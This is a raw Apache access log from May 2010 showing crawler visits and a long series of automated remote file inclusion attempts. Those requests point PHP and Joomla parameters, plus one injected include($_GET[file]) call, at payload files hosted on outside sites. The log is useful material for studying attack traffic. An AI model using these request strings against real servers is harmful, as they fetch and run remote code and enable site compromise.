75.136.121.230 - - [03/May/2010:02:25:13 -0500] "GET /logs/access_log.1251504000//s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:02:25:13 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
123.125.68.73 - - [03/May/2010:02:25:15 -0500] "GET /costume/costume1.htm HTTP/1.1" 200 2651 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
75.136.121.230 - - [03/May/2010:02:25:36 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:02:25:36 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
75.136.121.230 - - [03/May/2010:02:25:37 -0500] "GET /logs/access_log.1251504000//s_loadenv.inc.php?DOCUMENT_ROOT=http://cuitz.com/id/id1.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
207.46.204.182 - - [03/May/2010:02:32:54 -0500] "GET /logs/access_log.1204588800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.194 - - [03/May/2010:02:34:55 -0500] "GET /logs/access_log.1182384000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
208.115.111.248 - - [03/May/2010:02:39:16 -0500] "GET /?D=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [03/May/2010:02:39:18 -0500] "GET /logs/access_log.1206057600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
208.115.111.248 - - [03/May/2010:02:39:21 -0500] "GET /?M=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:23 -0500] "GET /?N=D HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:25 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:27 -0500] "GET /logs/access_log.1219104000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:30 -0500] "GET /logs/access_log.1225152000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:32 -0500] "GET /logs/access_log.1235001600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [03/May/2010:02:39:35 -0500] "GET /logs/access_log.1243296000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
67.195.112.180 - - [03/May/2010:02:44:22 -0500] "GET /logs/access_log.1187654400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.80.108.70 - - [03/May/2010:02:57:33 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:02:57:33 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:02:57:34 -0500] "GET /logs/access_log.1270684800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:02:57:35 -0500] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 328 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:02:57:35 -0500] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 333 "-""Mozilla/5.0"
220.80.108.70 - - [03/May/2010:02:57:36 -0500] "GET /logs/access_log.1270684800%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:03:02:55 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [03/May/2010:03:04:30 -0500] "GET /logs/access_log.1259107200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.13 - - [03/May/2010:03:08:59 -0500] "GET /logs/access_log.1215648000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.228.16.119 - - [03/May/2010:03:11:01 -0500] "GET /tattoo/tat-cd1.jpg HTTP/1.1" 200 67733 "http://images.google.ru/imglanding?q=old%20school%20tatoo&imgurl=http://c1.ac-images.myspacecdn.com/images01/70/m_6b6734c869d857506d06944a7bf3f05c.jpg&imgrefurl=http://www.myspace.com/oldschooltattoopiercing&usg=__xUydNFUqka0U-F67_WIqlUcPcak=&h=113&w=170&sz=9&hl=ru&sig2=VO0uwVun3-aBvhWxp_be1Q&um=1&itbs=1&tbnid=vP8p7yKKjDk6oM:&tbnh=66&tbnw=99&prev=/images%3Fq%3Dold%2Bschool%2Btatoo%26tbnid%3D9SpwlRwh0wlLlM%26tbnh%3D0%26tbnw%3D0%26um%3D1%26hl%3Dru%26newwindow%3D1%26client%3Dfirefox%26sa%3DX%26rls%3Dorg.mozilla:ru:official%26imgtype%3Di_similar%26tbs%3Disch:1&ei=goTeS969OcOg_ga6toX1Bg&tbnid=9SpwlRwh0wlLlM&tbnh=0&tbnw=0&um=1&newwindow=1&client=firefox&sa=X&rls=org.mozilla:ru:official&imgtype=i_similar&tbs=isch:1&start=14""Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2.3) Gecko/20100401 MRA 5.6 (build 03278) Firefox/3.6.3 ( .NET CLR 3.5.30729)"
216.129.119.12 - - [03/May/2010:03:11:56 -0500] "GET /logs/access_log.1245369600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.13.99 - - [03/May/2010:03:15:25 -0500] "GET /logs/access_log.1266278400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.177 - - [03/May/2010:03:15:50 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
188.118.212.10 - - [03/May/2010:03:20:34 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080924 Ubuntu/8.04 (hardy) Firefox/2.0.0.17"
207.46.13.145 - - [03/May/2010:03:34:25 -0500] "GET /logs/access_log.1210204800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [03/May/2010:03:38:46 -0500] "GET /logs/access_log.1235692800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
94.23.15.24 - - [03/May/2010:03:40:38 -0500] "GET /logs/solpot.html?body=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 300 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:03:40:38 -0500] "GET /logs/access_log.1262390400/solpot.html?body=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:03:40:38 -0500] "GET /logs/access_log.1263513600/solpot.html?body=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 322 "-""Mozilla/5.0"
94.23.15.24 - - [03/May/2010:03:40:38 -0500] "GET /solpot.html?body=http://www.nationalmedecine.com/forum/id1.txt???? HTTP/1.1" 404 295 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:03:41:37 -0500] "GET /logs/access_log.1221004800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.86 - - [03/May/2010:03:43:55 -0500] "GET /logs/access_log.1194912000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.34.19 - - [03/May/2010:03:44:58 -0500] "GET /logs/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:44:58 -0500] "GET /admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:44:58 -0500] "GET /logs/access_log.1261612800/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:44:58 -0500] "GET /logs/access_log.1263081600/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:12 -0500] "GET /admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:12 -0500] "GET /logs/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:12 -0500] "GET /logs/access_log.1261612800/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:14 -0500] "GET /logs/access_log.1263081600/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:40 -0500] "GET /admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:40 -0500] "GET /logs/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 303 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:03:45:40 -0500] "GET /logs/access_log.1263081600/admin_main.php?path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 325 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:03:53:09 -0500] "GET /logs/access_log.1214870400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [03/May/2010:03:56:37 -0500] "GET /logs/access_log.1253318400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
78.110.50.139 - - [03/May/2010:03:56:43 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:56:43 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:56:43 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:56:45 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:56:45 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:56:45 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:00 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:00 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:00 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:01 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:01 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
174.133.173.34 - - [03/May/2010:03:57:01 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://hasslefreetours.co.za/wp-content/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:57:07 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:57:07 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:03:57:07 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
216.129.119.43 - - [03/May/2010:04:00:36 -0500] "GET /logs/access_log.1271030400 HTTP/1.1" 200 643402 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.132 - - [03/May/2010:04:02:10 -0500] "GET /logs/access_log.1238716800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.130 - - [03/May/2010:04:03:07 -0500] "GET /logs/access_log.1244073600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
78.110.50.139 - - [03/May/2010:04:03:19 -0500] "GET /logs/access_log.1265673600//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:04:03:19 -0500] "GET /logs//adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
78.110.50.139 - - [03/May/2010:04:03:19 -0500] "GET //adm/krgourl.php?DOCUMENT_ROOT=http://td-uralsnab.ru/images/id1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
208.113.148.15 - - [03/May/2010:04:04:12 -0500] "GET //theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 326 "-""Mozilla/5.0"
208.113.148.15 - - [03/May/2010:04:04:12 -0500] "GET /logs//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 331 "-""Mozilla/5.0"
208.113.148.15 - - [03/May/2010:04:04:12 -0500] "GET /logs/access_log.1212969600//theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=http://elitesitter.com/images/baner.txt? HTTP/1.1" 404 353 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:04:08:10 -0500] "GET /logs/access_log.1242432000%20%20/admin_lib.inc.php?skin_path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 330 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:04:08:10 -0500] "GET /admin_lib.inc.php?skin_path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 301 "-""Mozilla/5.0"
218.38.34.19 - - [03/May/2010:04:08:10 -0500] "GET /logs/admin_lib.inc.php?skin_path=http://www.villantomagazin.com//1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
207.46.204.232 - - [03/May/2010:04:10:24 -0500] "GET /logs/access_log.1161129600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.100 - - [03/May/2010:04:14:54 -0500] "GET /costume/cd-page1.htm HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
91.121.104.108 - - [03/May/2010:04:18:17 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:18:26 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:18:26 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
67.195.112.180 - - [03/May/2010:04:18:28 -0500] "GET /logs/access_log.1196208000 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
194.100.228.237 - - [03/May/2010:04:19:02 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:19:02 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:19:02 -0500] "GET /logs/access_log.1234569600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:19:42 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:19:42 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:19:42 -0500] "GET /logs/access_log.1234569600//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:19:50 -0500] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:19:50 -0500] "GET /logs/access_log.1270684800%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:19:50 -0500] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:20:06 -0500] "GET /logs/access_log.1242432000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
194.100.228.237 - - [03/May/2010:04:22:10 -0500] "GET /logs/access_log.1242432000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.250.255.243 - - [03/May/2010:04:23:44 -0500] "GET /costume/links.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
91.121.104.108 - - [03/May/2010:04:24:37 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:44 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:44 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET /logs/access_log.1266019200//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET /logs//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 299 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET //index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 294 "-""Mozilla/5.0"
110.15.200.48 - - [03/May/2010:04:25:45 -0500] "GET /logs/access_log.1265760000//index.php?option=com_weblinks&&mosConfig.absolute.path=http://www.nationalmedecine.com/forum/id1.txt????? HTTP/1.1" 404 321 "-""Mozilla/5.0"
91.121.104.108 - - [03/May/2010:04:26:12 -0500] "GET /logs/access_log.1270684800//components/com_cpg/cpg.php?mosConfig_absolute_path=http://wonil.org/bbs//sc1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
173.83.250.21 - - [03/May/2010:04:35:08 -0500] "GET /setup.php?dir=http://christenplein.com/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
173.83.250.21 - - [03/May/2010:04:35:08 -0500] "GET /logs/setup.php?dir=http://christenplein.com/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
173.83.250.21 - - [03/May/2010:04:35:09 -0500] "GET /logs/access_log.1262995200/setup.php?dir=http://christenplein.com/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.46.199.185 - - [03/May/2010:04:42:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.237 - - [03/May/2010:04:43:25 -0500] "GET /logs/access_log.1206576000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.46 - - [03/May/2010:04:49:55 -0500] "GET /logs/access_log.1199664000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [03/May/2010:04:51:45 -0500] "GET /logs/access_log.1211414400 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.18.166 - - [03/May/2010:04:55:04 -0500] "GET /logs/access_log.1268611200%20%20/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:04 -0500] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:04 -0500] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:08 -0500] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:08 -0500] "GET /logs/access_log.1268611200%20%20/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 322 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:08 -0500] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:38 -0500] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:38 -0500] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:55:38 -0500] "GET /logs/access_log.1268611200/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:56:00 -0500] "GET /index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:56:00 -0500] "GET /logs/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
91.121.18.166 - - [03/May/2010:04:56:00 -0500] "GET /logs/access_log.1268611200/index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.boomong.com/bbs//data/1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
70.38.117.233 - - [03/May/2010:05:08:16 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
70.38.117.233 - - [03/May/2010:05:08:16 -0500] "GET /logs/access_log.1270598400%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
70.38.117.233 - - [03/May/2010:05:08:16 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
207.46.195.230 - - [03/May/2010:05:08:24 -0500] "GET /logs/access_log.1180051200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
70.38.117.233 - - [03/May/2010:05:08:52 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://ricajupanu.go.ro/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
